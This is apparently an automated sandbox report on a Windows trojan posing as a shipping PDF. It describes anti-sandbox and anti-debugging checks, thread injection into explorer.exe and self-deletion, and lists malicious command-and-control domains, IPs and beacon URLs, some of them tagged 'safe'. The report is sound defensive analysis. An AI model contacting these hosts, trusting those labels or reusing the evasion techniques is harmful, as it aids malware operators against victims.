    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527894 Sample: Arrival Notice, CIA Awb Inv... Startdate: 24/11/2021 Architecture: WINDOWS Score: 100 29 www.thaicharuen.com 2->29 31 www.teslafreesuperchargermiles.com 2->31 33 25 other IPs or domains 2->33 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 Arrival Notice, CIA Awb Inv Form.pdf.exe 1 2->11         started        signatures3 process4 signatures5 63 Tries to detect Any.run 11->63 65 Hides threads from debuggers 11->65 14 Arrival Notice, CIA Awb Inv Form.pdf.exe 6 11->14         started        process6 dnsIp7 41 drive.google.com 142.250.185.110, 443, 49805 GOOGLEUS United States 14->41 43 googlehosted.l.googleusercontent.com 142.250.186.97, 443, 49806 GOOGLEUS United States 14->43 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 3 other signatures 14->73 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 35 soarlikeaneagle.site 70.40.220.123, 49822, 80 UNIFIEDLAYER-AS-1US United States 18->35 37 www.musee-radix-hairsalon.com 183.181.99.12, 49814, 80 SAKURA-CSAKURAInternetIncJP Japan 18->37 39 7 other IPs or domains 18->39 53 System process connects to network (likely due to code injection or exploit) 18->53 55 Uses netstat to query active network connections and open ports 18->55 22 NETSTAT.EXE 18->22         started        signatures11 process12 signatures13 57 Self deletion via cmd delete 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 Maps a DLL or memory area into another process 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Arrival Notice, CIA Awb Inv Form.pdf.exe37%VirustotalBrowse
    Arrival Notice, CIA Awb Inv Form.pdf.exe31%ReversingLabsWin32.Trojan.Tnega

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://powerpoint.office.come0%Avira URL Cloudsafe
    http://www.thaicharuen.com/s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.soarlikeaneagle.site/s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.teslafreesuperchargermiles.com/s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.hara.cloud/s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp0%Avira URL Cloudsafe
    http://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.celsb.com/s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    www.papllc.biz/s3f1/0%Avira URL Cloudsafe
    http://schemas.micro0%Avira URL Cloudsafe
    http://www.4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp0%Avira URL Cloudsafe
    http://www.izivente.com/s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.mvsteals.com/s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    http://www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP0%Avira URL Cloudsafe
    https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    www.thaicharuen.com
    		107.178.157.225
    		truetrue
      		unknown
      4mtechmachines.com
      		184.168.98.97
      		truetrue
        		unknown
        hara.cloud
        		34.102.136.180
        		truefalse
          		unknown
          www.musee-radix-hairsalon.com
          		183.181.99.12
          		truetrue
            		unknown
            www.celsb.com
            		154.94.229.8
            		truetrue
              		unknown
              www.izivente.com
              		64.190.62.111
              		truetrue
                		unknown
                teslafreesuperchargermiles.com
                		34.102.136.180
                		truefalse
                  		unknown
                  mvsteals.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    soarlikeaneagle.site
                    		70.40.220.123
                    		truetrue
                      		unknown
                      drive.google.com
                      		142.250.185.110
                      		truefalse
                        		high
                        teespring.netlifyglobalcdn.com
                        		35.198.112.85
                        		truefalse
                          		unknown
                          www.evaccines.com
                          		3.64.163.50
                          		truetrue
                            		unknown
                            googlehosted.l.googleusercontent.com
                            		142.250.186.97
                            		truefalse
                              		high
                              www.federal-funds-deposit.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.safety1-venture.us
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.4mtechmachines.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.facebook-meta-morphosis.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      doc-14-5s-docs.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.teslafreesuperchargermiles.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mvsteals.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.hara.cloud
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.papllc.biz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.eggchanceapple.top
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.bncmobile.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.morningstarapparel.space
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.soarlikeaneagle.site
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=downloadfalse
                                                          		high
                                                          http://www.thaicharuen.com/s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.soarlikeaneagle.site/s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.teslafreesuperchargermiles.com/s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGPfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hara.cloud/s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.celsb.com/s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          www.papllc.biz/s3f1/true
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.izivente.com/s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mvsteals.com/s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGPfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://word.office.comexplorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.comArrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  https://powerpoint.office.comeexplorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://doc-14-5s-docs.googleusercontent.com/tographyArrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://doc-14-5s-docs.googleusercontent.com/Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_landerNETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmpfalse
                                                                            		high
                                                                            https://excel.office.comexplorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.foreca.comexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.microexplorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://outlook.comexplorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://aka.ms/odirmexplorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com/?ocid=iehpexplorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://drive.google.com/Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpfalse
                                                                                            		high
                                                                                            https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://api.msn.com/explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.msn.com/v1/News/Feed/Windows?apikey=aexplorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://windows.msn.com:443/shellexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/?ocid=iehpAexplorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com:443/en-us/feedexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://csp.withgoogle.com/csp/report-to/gse_l9ocaqArrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown

                                                                                                              Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              70.40.220.123
                                                                                                              		soarlikeaneagle.siteUnited States
                                                                                                              		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              154.94.229.8
                                                                                                              		www.celsb.comSeychelles
                                                                                                              		32708ROOTNETWORKSUStrue
                                                                                                              183.181.99.12
                                                                                                              		www.musee-radix-hairsalon.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                              184.168.98.97
                                                                                                              		4mtechmachines.comUnited States
                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                              34.102.136.180
                                                                                                              		hara.cloudUnited States
                                                                                                              		15169GOOGLEUSfalse
                                                                                                              142.250.185.110
                                                                                                              		drive.google.comUnited States
                                                                                                              		15169GOOGLEUSfalse
                                                                                                              64.190.62.111
                                                                                                              		www.izivente.comUnited States
                                                                                                              		11696NBS11696UStrue
                                                                                                              107.178.157.225
                                                                                                              		www.thaicharuen.comUnited States
                                                                                                              		26658HENGTONG-IDC-LLCUStrue
                                                                                                              3.64.163.50
                                                                                                              		www.evaccines.comUnited States
                                                                                                              		16509AMAZON-02UStrue
                                                                                                              142.250.186.97
                                                                                                              		googlehosted.l.googleusercontent.comUnited States
                                                                                                              		15169GOOGLEUSfalse
                                                                                                              35.198.112.85
                                                                                                              		teespring.netlifyglobalcdn.comUnited States
                                                                                                              		15169GOOGLEUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                              Analysis ID:527894
                                                                                                              Start date:24.11.2021
                                                                                                              Start time:15:04:25
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 14m 46s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Sample file name:Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                              Run name:Suspected Instruction Hammering
                                                                                                              Number of analysed new started processes analysed:13
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • HDC enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/1@23/11
                                                                                                              EGA Information:Failed
                                                                                                              HDC Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 61%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Adjust boot time
                                                                                                              • Enable AMSI
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              Warnings:
                                                                                                              Show All
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                              • TCP Packets have been reduced to 100
                                                                                                              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244
                                                                                                              • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, nexusrules.officeapps.live.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              No simulations

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              64.190.62.111VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                                                                                              • www.nft2dollar.com/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=GnXHaya5a2eUgv0WruAXx1t7Zy7Y+CgMkaSmHXdRLE9D7kdhxI3EIeUSBdU4I7rnjaf8
                                                                                                              DRAFT CI,PL,BL.xlsxGet hashmaliciousBrowse
                                                                                                              • www.izivente.com/s3f1/?3fcxyBj0=PTZX9bbD2H3/eSLZCimGk0mts24461Z1qQt3uJtp3urdJLalWM2taAbNKzkqfQ9DezYskQ==&gr0=YJBp
                                                                                                              202111161629639000582.exeGet hashmaliciousBrowse
                                                                                                              • www.bfjchonn.com/wkgp/?4h5=r5bTipvL1HTTWJiBtp2K8HnZFDU224i7HTxLWa9c2vsP4zdxhg+H0Im5NRGa4PGcfm+i&BTz=9rWdJt
                                                                                                              Offer quotation2021.xlsxGet hashmaliciousBrowse
                                                                                                              • www.xrgoods.com/yrcy/?6l=o8-xnJRXvfWl_47P&F2MtYz0H=ucfXCxnpvv5Tz8Xk/vwH4BguhZh3+/Q/1elD1okmLu9zvHthbeyS8MDlxYeDFFmWsSnHeQ==
                                                                                                              50% TT advance copy.docGet hashmaliciousBrowse
                                                                                                              • www.solarpanelquote.space/xgmi/?OL=ybl0d27x&4hiLpToh=R40g5FCe/tl63Chpu0Qx+jb3BAlOBjU3GjWWTVYU0rZXCAGDgsAHqIO3R/E5Na38rBXbVw==
                                                                                                              e5obiX3KpV.exeGet hashmaliciousBrowse
                                                                                                              • www.solarpanelquote.space/xgmi/?1bvpdV=R40g5FCb/ql+3Stls0Qx+jb3BAlOBjU3GjOGPWEVwLZWCxqFn8RL8M21SaovJKzPgCKr&K0D0u=d48luxV8if90
                                                                                                              38566F9A331BB8503835D7ABFDC027D9D3FA45C65F388.exeGet hashmaliciousBrowse
                                                                                                              • jayp.eu/loki/fre.php
                                                                                                              rEC0x536o5.exeGet hashmaliciousBrowse
                                                                                                              • www.izivente.com/s3f1/?XZeT=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&_dIpGp=dTiPIlmXgVLtX
                                                                                                              Order RFQ#2021-16-11.exeGet hashmaliciousBrowse
                                                                                                              • www.securityleaderboard.com/y7n5/?X2MLR0Kx=ZfjAO2cD3Pnxf5rX5s/lIosAd5PEZrgbRd/L4aWDkUxXEvujBB7ELJjM5g0yEcfltYO/&qXtd=5ji4dxg8AFFDPP80
                                                                                                              Tax payment invoice - Wd, November 17, 2021,pdf.exeGet hashmaliciousBrowse
                                                                                                              • www.eaujeunetuesunique.com/e3rs/?7n=0lMJyNabEIuqOIYu6FENlOu3MaEwRpRqACIVbnuNhXgO7wan67zzeCUSx/HLaRSQ/RIP&q0DXK=OR-p4BxxYZ
                                                                                                              Draft CI,PL,BL.xlsxGet hashmaliciousBrowse
                                                                                                              • www.izivente.com/s3f1/?xh=PTZX9bbD2H3/eSLZCimGk0mts24461Z1qQt3uJtp3urdJLalWM2taAbNKzkqfQ9DezYskQ==&yPxd=6l5T8Vu872r0J6v
                                                                                                              Company Profile.exeGet hashmaliciousBrowse
                                                                                                              • www.ontracgps.com/dc02/?1bNDudv=AmP/SaMbbZ2MIsYUXXuAR7hhieN2CbGMERDVdX17LUO7+kzhSWd5nHgK7d6p7jfv+JAn&Tp=NBZl4DOPndid
                                                                                                              rgQlelmw0H.exeGet hashmaliciousBrowse
                                                                                                              • www.merxeduct.com/kzk9/?z8wprNM=WzyfFTwXrFBJoP9SBal/6McArMezXX4+T8rZ3lhz2mZqtx3XZtnMDX8QvpDBUs1Bvhc7&-Zc4t=R48HBZJ8-T
                                                                                                              INV8897.xlsxGet hashmaliciousBrowse
                                                                                                              • www.gaia32.com/scb0/?cHJ=5jU8GjA0BTltmzO0&9r=xqFzn59bvK9qKZW7X3IG0iZJd+zA8VWjiYtamAXhuVGruAibW5S1Hm5/cVQZ9j65xMUZ8Q==
                                                                                                              Company profile.exeGet hashmaliciousBrowse
                                                                                                              • www.skindefense5.com/xzes/?r8Rd2=nzYmw7ObxngERypQ/m2S0s66JIboZ9taw8WhBad2s6KK3jGmAKDva9FwOPgQcjJO5ysj&q8z=h6Opkv6H1zQxJb1p
                                                                                                              RFQ 38383090.exeGet hashmaliciousBrowse
                                                                                                              • www.spaceameseu.xyz/p0on/?Ql=9ri8&4hhHazLH=O9eInfgFV8/v8l+wYbQzCWGHyl4wGPzJrAtqjnpoJ5MKj1GvSLXJ6XtzXEu9OAFzkHbf
                                                                                                              PURCHASE ORDER NO.ATPL_PO_21115_05687537_2021-22.exeGet hashmaliciousBrowse
